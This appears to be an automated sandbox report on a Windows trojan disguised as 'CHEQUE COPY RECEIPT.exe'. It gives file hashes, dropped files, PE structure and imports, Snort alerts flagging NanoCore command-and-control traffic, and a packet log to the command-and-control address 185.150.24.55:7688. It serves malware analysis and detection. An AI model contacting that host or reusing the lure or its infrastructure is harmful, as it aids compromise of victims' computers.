Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	ISO-8859 text, with CR line terminators, with escape sequences
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:K4oin:joi
MD5:	4343B3F60A47270C9117192785044AD8
SHA1:	6F48A2C7B2E9E66E29C7A3F19711AAFD1B3C2179
SHA-256:	7D8DE47DB830173F7E731C8685049C906288A9A8C9C7B7175D7DFFEE3655D242
SHA-512:	28D04BDB49F1545496D7F813B5932A7AF831899AF016B39A1106197FB01A2D0E10466CBAF6CDB1079C58145DC17A6CE2531EF51A548BFFDE3FD22A3D39645841
Malicious:	true
Preview:	...]M..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.533312255932956
Encrypted:	false
SSDEEP:	3:oNUWJRWmS0+q2qs7J:oNNJAmH+TqsV
MD5:	EB9DA02003EBF142462BBB7ED1224454
SHA1:	81A21F66CEF1CC55D2E8F0F5EB9AE0AB4AF830F1
SHA-256:	627FE62D0626FBE390F5A97884D85D612E1B3FF7831AFF8834B541259A8BA39B
SHA-512:	2D5A4CC44505AC7E5BDC7395135A0339051F629A4FE23970485D44C444057CFA785EDCD40890760FDE58874AFA564761D446335B894AA55518447D6CC0F1B7BD
Malicious:	false
Preview:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.947810553618582
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CHEQUE COPY RECEIPT.exe
File size:	332470
MD5:	403180100f3d966d4ea44c84d039a6d0
SHA1:	4b1af3fd502ad953024cb152c5a6d472fd0307c7
SHA256:	18ca07a540dbd6da66851f88c11ad7683486e33f5c2512fe5c4837c44f8f4bc3
SHA512:	1f6ab19d8b0f69bf7c4f9917966b6d6d818148d8fc10abc1d03b6f08f82c5c59ef449961e9d4055fa691854a216c3ea276ed659739d509a12a38ce6ac2c3640d
SSDEEP:	6144:y11QYLAKZReuEow82wBH6T6Evt4W6cUq5Aj+h3dDIge:GLAKZ8uPTBHW6C2DqCjOVIge
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403486
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ea4e67a31ace1a72683a99b80cf37830

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B0h]
call dword ptr [004080C0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F44Ch], eax
je 00007F8D48963273h
push ebx
call 00007F8D489663EEh
cmp eax, ebx
je 00007F8D48963269h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F8D4896636Ah
push esi
call dword ptr [004080B8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F8D4896324Dh
push 0000000Bh
call 00007F8D489663C2h
push 00000009h
call 00007F8D489663BBh
push 00000007h
mov dword ptr [0042F444h], eax
call 00007F8D489663AFh
cmp eax, ebx
je 00007F8D48963271h
push 0000001Eh
call eax
test eax, eax
je 00007F8D48963269h
or byte ptr [0042F44Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F518h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429878h
call dword ptr [0040816Ch]
push 0040A1ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x988	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65ad	0x6600	False	0.675628063725	data	6.48593060343	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4634765625	data	5.26110074066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25558	0x600	False	0.470052083333	data	4.21916068772	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x988	0xa00	False	0.455078125	data	4.30752796442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x38148	0x100	data	English	United States
RT_DIALOG	0x38248	0x11c	data	English	United States
RT_DIALOG	0x38364	0x60	data	English	United States
RT_VERSION	0x383c4	0x284	data	English	United States
RT_MANIFEST	0x38648	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Version Infos

Description	Data
LegalCopyright	Copyright patent ductus arteriosus
FileVersion	53.72.67.28
CompanyName	tapestry
LegalTrademarks	Ap Ma
Comments	wind screen
ProductName	homeland
FileDescription	anodyne
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/22/21-08:17:39.587905	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49719	7688	192.168.2.5	185.150.24.55
02/22/21-08:17:48.399746	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49723	7688	192.168.2.5	185.150.24.55
02/22/21-08:17:58.317320	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49726	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:05.430402	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49727	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:12.514532	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49728	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:19.118907	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49731	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:26.162311	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49734	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:33.388192	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49739	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:41.751477	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49740	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:50.274563	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49741	7688	192.168.2.5	185.150.24.55
02/22/21-08:18:57.259284	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	7688	192.168.2.5	185.150.24.55
02/22/21-08:19:03.677112	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49746	7688	192.168.2.5	185.150.24.55
02/22/21-08:19:10.806233	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49747	7688	192.168.2.5	185.150.24.55
02/22/21-08:19:17.472143	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49748	7688	192.168.2.5	185.150.24.55
02/22/21-08:19:23.677103	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49749	7688	192.168.2.5	185.150.24.55
02/22/21-08:19:30.716600	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49750	7688	192.168.2.5	185.150.24.55
02/22/21-08:19:37.652217	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49751	7688	192.168.2.5	185.150.24.55

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 08:17:39.134200096 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:39.343509912 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:39.345671892 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:39.587904930 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:39.823703051 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:39.860553026 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:40.071887970 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.210870028 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:40.282547951 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:40.551594019 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.551709890 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:40.823491096 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.864852905 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.871715069 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.871922016 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:40.913732052 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.915644884 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:40.915818930 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.103810072 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.119688034 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.121539116 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.151808023 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.152813911 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.153121948 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.153544903 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.161879063 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.161971092 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.181107998 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.191826105 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.192048073 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.192605972 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.192698956 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.383754015 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.383887053 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.384677887 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.384757996 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.391884089 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.392024994 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.423773050 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.423940897 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.424673080 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.425254107 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.443938971 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.444051981 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.471915007 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.472127914 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.489743948 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.489857912 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.520050049 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.520129919 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.520241976 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.520318031 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.523741961 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.523809910 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.544991016 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.545134068 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.583887100 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.591779947 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.592133045 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.593794107 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.594466925 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.594547033 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.624806881 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.632946968 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.633023977 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.649847984 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.671749115 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.672831059 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.674117088 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.704775095 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.706284046 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.711788893 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.744792938 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.744869947 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.752856016 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.783804893 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.788892984 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.791692972 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.793756962 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.793903112 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.801846981 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.831676960 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.831796885 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.832663059 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.841814995 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.842246056 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.872025967 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.880836010 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.881321907 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.889847040 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.912668943 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.912834883 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.913599014 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.914582014 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.914678097 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.921581984 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.951821089 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.951947927 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.962882042 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.983943939 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:41.984447002 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:41.999679089 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.031666040 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.031733990 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.041709900 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.073769093 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.073803902 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.073863029 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.074621916 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.074697018 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.103600025 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.119647026 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.119676113 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.119801044 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.144800901 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.144915104 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.152559996 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.153574944 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.153678894 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.164758921 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.191683054 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.192775965 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.193748951 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.202655077 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.202842951 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.216759920 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.231765985 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.231863976 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.233737946 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.234009027 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.243216038 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.243302107 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.271719933 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.272569895 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.273634911 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.304709911 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.315109968 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.319644928 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.320924997 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.351835012 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.352560043 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.363153934 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.373008013 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.391844034 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.391947031 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.392524958 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.398509026 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.432828903 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.434781075 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.436734915 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.437553883 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.437654972 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.441675901 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.441984892 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.479954004 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.480074883 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.482609034 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.482681036 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.503737926 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.503844976 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.544764996 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.545103073 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.552849054 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.552939892 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.584781885 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.585325956 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.592761993 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.592880964 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.593753099 CET	7688	49719	185.150.24.55	192.168.2.5
Feb 22, 2021 08:17:42.593826056 CET	49719	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:17:42.624823093 CET	7688	49719	185.150.24.55	192.168.2.5
